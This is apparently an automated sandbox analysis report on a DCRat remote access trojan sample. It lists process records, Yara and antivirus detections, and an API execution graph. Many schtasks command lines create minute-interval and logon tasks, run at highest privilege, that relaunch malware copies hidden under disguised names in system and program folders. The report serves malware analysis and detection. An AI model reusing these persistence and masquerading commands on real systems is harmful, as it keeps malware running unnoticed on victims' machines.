                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:16
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:18
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
                              Imagebase:0x9f0000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1870320993.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 88%, ReversingLabs
• Detection: 68%, Virustotal
                              Has exited:true

                              Target ID:21
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe"
                              Imagebase:0xcd0000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 88%, ReversingLabs
                              • Detection: 68%, Virustotal
                              Has exited:true

                              Target ID:23
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe"
                              Imagebase:0xdc0000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1825230562.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 88%, ReversingLabs
                              • Detection: 68%, Virustotal
                              Has exited:true


                                Execution Graph

                                Execution Coverage:9.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:9.2%
                                Total number of Nodes:1496
                                Total number of Limit Nodes:28
EnterCriticalSection 23646->23666 23649 d8743c 23647->23649 23649->23646 23678 d875c2 GetModuleHandleExW 23649->23678 23653 d87450 23656 d874c5 23653->23656 23665 d874ee 23653->23665 23686 d87f30 20 API calls _abort 23653->23686 23654 d8750b 23670 d8753d 23654->23670 23655 d87537 23687 d91a19 5 API calls ___delayLoadHelper2@8 23655->23687 23657 d874dd 23656->23657 23661 d881f1 _abort 5 API calls 23656->23661 23662 d881f1 _abort 5 API calls 23657->23662 23661->23657 23662->23665 23667 d8752e 23665->23667 23666->23653 23688 d8a441 LeaveCriticalSection 23667->23688 23669 d87507 23669->23654 23669->23655 23689 d8a836 23670->23689 23673 d8756b 23676 d875c2 _abort 8 API calls 23673->23676 23674 d8754b GetPEB 23674->23673 23675 d8755b GetCurrentProcess TerminateProcess 23674->23675 23675->23673 23677 d87573 ExitProcess 23676->23677 23679 d875ec GetProcAddress 23678->23679 23680 d8760f 23678->23680 23681 d87601 23679->23681 23682 d8761e 23680->23682 23683 d87615 FreeLibrary 23680->23683 23681->23680 23684 d7ec4a ___delayLoadHelper2@8 5 API calls 23682->23684 23683->23682 23685 d87628 23684->23685 23685->23646 23686->23656 23688->23669 23690 d8a85b 23689->23690 23693 d8a851 23689->23693 23691 d8a458 _abort 5 API calls 23690->23691 23691->23693 23692 d7ec4a ___delayLoadHelper2@8 5 API calls 23694 d87547 23692->23694 23693->23692 23694->23673 23694->23674 24759 d7acd0 100 API calls 24812 d719d0 26 API calls std::bad_exception::bad_exception 24760 d7a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24761 d7eac0 27 API calls pre_c_initialization 24817 d797c0 10 API calls 24763 d89ec0 21 API calls 24818 d8b5c0 GetCommandLineA GetCommandLineW 24819 d8ebc1 21 API calls __vsnwprintf_l 24821 d7ebf7 20 API calls 24822 d8abfd 6 API calls ___delayLoadHelper2@8 23804 d7e1f9 23805 d7e203 23804->23805 23806 d7df59 ___delayLoadHelper2@8 19 API calls 23805->23806 23807 d7e210 23806->23807 23810 d7aee0 23811 d7aeea __EH_prolog 23810->23811 23973 d6130b 23811->23973 23814 d7af2c 23817 
d7afa2 23814->23817 23818 d7af39 23814->23818 23878 d7af18 23814->23878 23815 d7b5cb 24038 d7cd2e 23815->24038 23820 d7b041 GetDlgItemTextW 23817->23820 23824 d7afbc 23817->23824 23821 d7af3e 23818->23821 23826 d7af75 23818->23826 23825 d7b077 23820->23825 23820->23826 23833 d6ddd1 53 API calls 23821->23833 23821->23878 23822 d7b5f7 23827 d7b611 GetDlgItem SendMessageW 23822->23827 23828 d7b600 SendDlgItemMessageW 23822->23828 23823 d7b5e9 SendMessageW 23823->23822 23832 d6ddd1 53 API calls 23824->23832 23830 d7b08f GetDlgItem 23825->23830 23971 d7b080 23825->23971 23829 d7af96 KiUserCallbackDispatcher 23826->23829 23826->23878 24056 d79da4 GetCurrentDirectoryW 23827->24056 23828->23827 23829->23878 23835 d7b0c5 SetFocus 23830->23835 23836 d7b0a4 SendMessageW SendMessageW 23830->23836 23837 d7afde SetDlgItemTextW 23832->23837 23838 d7af58 23833->23838 23834 d7b641 GetDlgItem 23839 d7b664 SetWindowTextW 23834->23839 23840 d7b65e 23834->23840 23841 d7b0d5 23835->23841 23857 d7b0ed 23835->23857 23836->23835 23842 d7afec 23837->23842 24078 d61241 SHGetMalloc 23838->24078 24057 d7a2c7 GetClassNameW 23839->24057 23840->23839 23845 d6ddd1 53 API calls 23841->23845 23850 d7aff9 GetMessageW 23842->23850 23842->23878 23849 d7b0df 23845->23849 23846 d7af5f 23851 d7af63 SetDlgItemTextW 23846->23851 23846->23878 23847 d7b56b 23852 d6ddd1 53 API calls 23847->23852 24079 d7cb5a 23849->24079 23856 d7b010 IsDialogMessageW 23850->23856 23850->23878 23851->23878 23853 d7b57b SetDlgItemTextW 23852->23853 23858 d7b58f 23853->23858 23856->23842 23860 d7b01f TranslateMessage DispatchMessageW 23856->23860 23861 d6ddd1 53 API calls 23857->23861 23863 d6ddd1 53 API calls 23858->23863 23860->23842 23862 d7b124 23861->23862 23865 d6400a _swprintf 51 API calls 23862->23865 23866 d7b5b8 23863->23866 23864 d7b6af 23870 d7b6df 23864->23870 23874 d6ddd1 53 API calls 23864->23874 23871 d7b136 23865->23871 23872 d6ddd1 53 API calls 23866->23872 23867 d7b0e6 23983 d6a04f 23867->23983 23869 d7bdf5 98 
API calls 23869->23864 23877 d7bdf5 98 API calls 23870->23877 23910 d7b797 23870->23910 23876 d7cb5a 16 API calls 23871->23876 23872->23878 23875 d7b6c2 SetDlgItemTextW 23874->23875 23882 d6ddd1 53 API calls 23875->23882 23876->23867 23883 d7b6fa 23877->23883 23879 d7b847 23884 d7b850 EnableWindow 23879->23884 23885 d7b859 23879->23885 23880 d7b174 GetLastError 23881 d7b17f 23880->23881 23989 d7a322 SetCurrentDirectoryW 23881->23989 23887 d7b6d6 SetDlgItemTextW 23882->23887 23893 d7b70c 23883->23893 23909 d7b731 23883->23909 23884->23885 23888 d7b876 23885->23888 24097 d612c8 GetDlgItem EnableWindow 23885->24097 23887->23870 23892 d7b89d 23888->23892 23901 d7b895 SendMessageW 23888->23901 23889 d7b195 23890 d7b1ac 23889->23890 23891 d7b19e GetLastError 23889->23891 23900 d7b227 23890->23900 23904 d7b237 23890->23904 23906 d7b1c4 GetTickCount 23890->23906 23891->23890 23892->23878 23902 d6ddd1 53 API calls 23892->23902 24095 d79635 32 API calls 23893->24095 23894 d7b78a 23896 d7bdf5 98 API calls 23894->23896 23896->23910 23898 d7b86c 24098 d612c8 GetDlgItem EnableWindow 23898->24098 23900->23904 23905 d7b46c 23900->23905 23901->23892 23908 d7b8b6 SetDlgItemTextW 23902->23908 23903 d7b725 23903->23909 23912 d7b407 23904->23912 23913 d7b24f GetModuleFileNameW 23904->23913 23998 d612e6 GetDlgItem ShowWindow 23905->23998 23914 d6400a _swprintf 51 API calls 23906->23914 23907 d7b825 24096 d79635 32 API calls 23907->24096 23908->23878 23909->23894 23916 d7bdf5 98 API calls 23909->23916 23910->23879 23910->23907 23917 d6ddd1 53 API calls 23910->23917 23912->23826 23925 d6ddd1 53 API calls 23912->23925 24089 d6eb3a 80 API calls 23913->24089 23920 d7b1dd 23914->23920 23922 d7b75f 23916->23922 23917->23910 23918 d7b47c 23999 d612e6 GetDlgItem ShowWindow 23918->23999 23990 d6971e 23920->23990 23921 d7b844 23921->23879 23922->23894 23926 d7b768 DialogBoxParamW 23922->23926 23924 d7b275 23928 d6400a _swprintf 51 API calls 23924->23928 23929 d7b41b 23925->23929 23926->23826 
23926->23894 23927 d7b486 23930 d6ddd1 53 API calls 23927->23930 23931 d7b297 CreateFileMappingW 23928->23931 23932 d6400a _swprintf 51 API calls 23929->23932 23934 d7b490 SetDlgItemTextW 23930->23934 23935 d7b376 __vsnwprintf_l 23931->23935 23936 d7b2f9 GetCommandLineW 23931->23936 23937 d7b439 23932->23937 24000 d612e6 GetDlgItem ShowWindow 23934->24000 23939 d7b381 ShellExecuteExW 23935->23939 23941 d7b30a 23936->23941 23951 d6ddd1 53 API calls 23937->23951 23938 d7b203 23942 d7b20a GetLastError 23938->23942 23943 d7b215 23938->23943 23944 d7b39e 23939->23944 24090 d7ab2e SHGetMalloc 23941->24090 23942->23943 23947 d69653 79 API calls 23943->23947 23957 d7b3e1 23944->23957 23966 d7b3cd Sleep 23944->23966 23945 d7b4a2 SetDlgItemTextW GetDlgItem 23948 d7b4d7 23945->23948 23949 d7b4bf GetWindowLongW SetWindowLongW 23945->23949 23947->23900 24001 d7bdf5 23948->24001 23949->23948 23950 d7b326 24091 d7ab2e SHGetMalloc 23950->24091 23951->23826 23954 d7b332 24092 d7ab2e SHGetMalloc 23954->24092 23957->23912 23963 d7b3f7 UnmapViewOfFile CloseHandle 23957->23963 23958 d7bdf5 98 API calls 23959 d7b4f3 23958->23959 24026 d7d0f5 23959->24026 23960 d7b33e 24093 d6ecad 80 API calls ___scrt_get_show_window_mode 23960->24093 23963->23912 23965 d7b355 MapViewOfFile 23965->23935 23966->23944 23966->23957 23967 d7bdf5 98 API calls 23970 d7b519 23967->23970 23968 d7b542 24094 d612c8 GetDlgItem EnableWindow 23968->24094 23970->23968 23972 d7bdf5 98 API calls 23970->23972 23971->23826 23971->23847 23972->23968 23974 d61314 23973->23974 23975 d6136d 23973->23975 23977 d6137a 23974->23977 24099 d6da98 62 API calls 2 library calls 23974->24099 24100 d6da71 GetWindowLongW SetWindowLongW 23975->24100 23977->23814 23977->23815 23977->23878 23979 d61336 23979->23977 23980 d61349 GetDlgItem 23979->23980 23980->23977 23981 d61359 23980->23981 23981->23977 23982 d6135f SetWindowTextW 23981->23982 23982->23977 23986 d6a059 23983->23986 23984 d6a0ea 23985 d6a207 9 API calls 23984->23985 23987 
d6a113 23984->23987 23985->23987 23986->23984 23986->23987 24101 d6a207 23986->24101 23987->23880 23987->23881 23989->23889 23991 d69728 23990->23991 23992 d69786 23991->23992 23993 d69792 CreateFileW 23991->23993 23994 d6b66c 2 API calls 23992->23994 23995 d697e4 23992->23995 23993->23992 23996 d697cb 23994->23996 23995->23938 23996->23995 23997 d697cf CreateFileW 23996->23997 23997->23995 23998->23918 23999->23927 24000->23945 24002 d7bdff __EH_prolog 24001->24002 24003 d7b4e5 24002->24003 24133 d7aa36 24002->24133 24003->23958 24006 d7aa36 ExpandEnvironmentStringsW 24015 d7be36 _wcsrchr 24006->24015 24007 d7c11d SetWindowTextW 24007->24015 24012 d7bf0b SetFileAttributesW 24014 d7bfc5 GetFileAttributesW 24012->24014 24025 d7bf25 ___scrt_get_show_window_mode 24012->24025 24014->24015 24016 d7bfd7 DeleteFileW 24014->24016 24015->24003 24015->24006 24015->24007 24015->24012 24018 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24015->24018 24021 d7c327 SendMessageW 24015->24021 24137 d717ac CompareStringW 24015->24137 24138 d79da4 GetCurrentDirectoryW 24015->24138 24140 d6a52a 7 API calls 24015->24140 24141 d6a4b3 FindClose 24015->24141 24142 d7ab9a 76 API calls new 24015->24142 24143 d835de 24015->24143 24016->24015 24019 d7bfe8 24016->24019 24018->24015 24020 d6400a _swprintf 51 API calls 24019->24020 24022 d7c008 GetFileAttributesW 24020->24022 24021->24015 24022->24019 24023 d7c01d MoveFileW 24022->24023 24023->24015 24024 d7c035 MoveFileExW 24023->24024 24024->24015 24025->24014 24025->24015 24139 d6b4f7 52 API calls 2 library calls 24025->24139 24027 d7d0ff __EH_prolog 24026->24027 24158 d6fead 24027->24158 24029 d7d130 24162 d65c59 24029->24162 24031 d7d14e 24166 d67c68 24031->24166 24035 d7d1a1 24183 d67cfb 24035->24183 24037 d7b504 24037->23967 24039 d7cd38 24038->24039 24040 d79d1a 4 API calls 24039->24040 24041 d7cd3d 24040->24041 24042 d7b5d1 24041->24042 24043 d7cd45 GetWindow 24041->24043 24042->23822 24042->23823 24043->24042 24044 d7cd65 24043->24044 
24044->24042 24045 d7cd72 GetClassNameW 24044->24045 24047 d7cd96 GetWindowLongW 24044->24047 24048 d7cdfa GetWindow 24044->24048 24617 d717ac CompareStringW 24045->24617 24047->24048 24049 d7cda6 SendMessageW 24047->24049 24048->24042 24048->24044 24049->24048 24050 d7cdbc GetObjectW 24049->24050 24618 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24050->24618 24052 d7cdd3 24619 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24052->24619 24620 d79f5d 8 API calls ___scrt_get_show_window_mode 24052->24620 24055 d7cde4 SendMessageW DeleteObject 24055->24048 24056->23834 24058 d7a2e8 24057->24058 24064 d7a30d 24057->24064 24621 d717ac CompareStringW 24058->24621 24059 d7a312 SHAutoComplete 24060 d7a31b 24059->24060 24065 d7a7c3 24060->24065 24062 d7a2fb 24063 d7a2ff FindWindowExW 24062->24063 24062->24064 24063->24064 24064->24059 24064->24060 24066 d7a7cd __EH_prolog 24065->24066 24067 d61380 82 API calls 24066->24067 24068 d7a7ef 24067->24068 24622 d61f4f 24068->24622 24071 d7a809 24073 d61631 84 API calls 24071->24073 24072 d7a818 24074 d61951 126 API calls 24072->24074 24075 d7a814 24073->24075 24077 d7a83a __vsnwprintf_l new 24074->24077 24075->23864 24075->23869 24076 d61631 84 API calls 24076->24075 24077->24075 24077->24076 24078->23846 24080 d7ac74 5 API calls 24079->24080 24081 d7cb66 GetDlgItem 24080->24081 24082 d7cbbc SendMessageW SendMessageW 24081->24082 24083 d7cb88 24081->24083 24084 d7cc17 SendMessageW SendMessageW SendMessageW 24082->24084 24085 d7cbf8 24082->24085 24086 d7cb93 ShowWindow SendMessageW SendMessageW 24083->24086 24087 d7cc6d SendMessageW 24084->24087 24088 d7cc4a SendMessageW 24084->24088 24085->24084 24086->24082 24087->23867 24088->24087 24089->23924 24090->23950 24091->23954 24092->23960 24093->23965 24094->23971 24095->23903 24096->23921 24097->23898 24098->23888 24099->23979 24100->23977 24102 d6a214 24101->24102 24103 d6a238 24102->24103 24104 d6a22b CreateDirectoryW 24102->24104 24122 d6a180 24103->24122 24104->24103 
24106 d6a26b 24104->24106 24111 d6a27a 24106->24111 24114 d6a444 24106->24114 24108 d6a27e GetLastError 24108->24111 24109 d6b66c 2 API calls 24112 d6a254 24109->24112 24111->23986 24112->24108 24113 d6a258 CreateDirectoryW 24112->24113 24113->24106 24113->24108 24115 d7e360 24114->24115 24116 d6a451 SetFileAttributesW 24115->24116 24117 d6a467 24116->24117 24118 d6a494 24116->24118 24119 d6b66c 2 API calls 24117->24119 24118->24111 24120 d6a47b 24119->24120 24120->24118 24121 d6a47f SetFileAttributesW 24120->24121 24121->24118 24125 d6a194 24122->24125 24126 d7e360 24125->24126 24127 d6a1a1 GetFileAttributesW 24126->24127 24128 d6a1b2 24127->24128 24129 d6a189 24127->24129 24130 d6b66c 2 API calls 24128->24130 24129->24108 24129->24109 24131 d6a1c6 24130->24131 24131->24129 24132 d6a1ca GetFileAttributesW 24131->24132 24132->24129 24134 d7aa40 24133->24134 24135 d7ab16 24134->24135 24136 d7aaf3 ExpandEnvironmentStringsW 24134->24136 24135->24015 24136->24135 24137->24015 24138->24015 24139->24025 24140->24015 24141->24015 24142->24015 24144 d88606 24143->24144 24145 d8861e 24144->24145 24146 d88613 24144->24146 24147 d8862f FindHandler 24145->24147 24148 d88626 24145->24148 24149 d88518 __vsnwprintf_l 21 API calls 24146->24149 24151 d88659 HeapReAlloc 24147->24151 24152 d88634 24147->24152 24157 d871ad 7 API calls 2 library calls 24147->24157 24150 d884de _free 20 API calls 24148->24150 24153 d8861b 24149->24153 24150->24153 24151->24147 24151->24153 24156 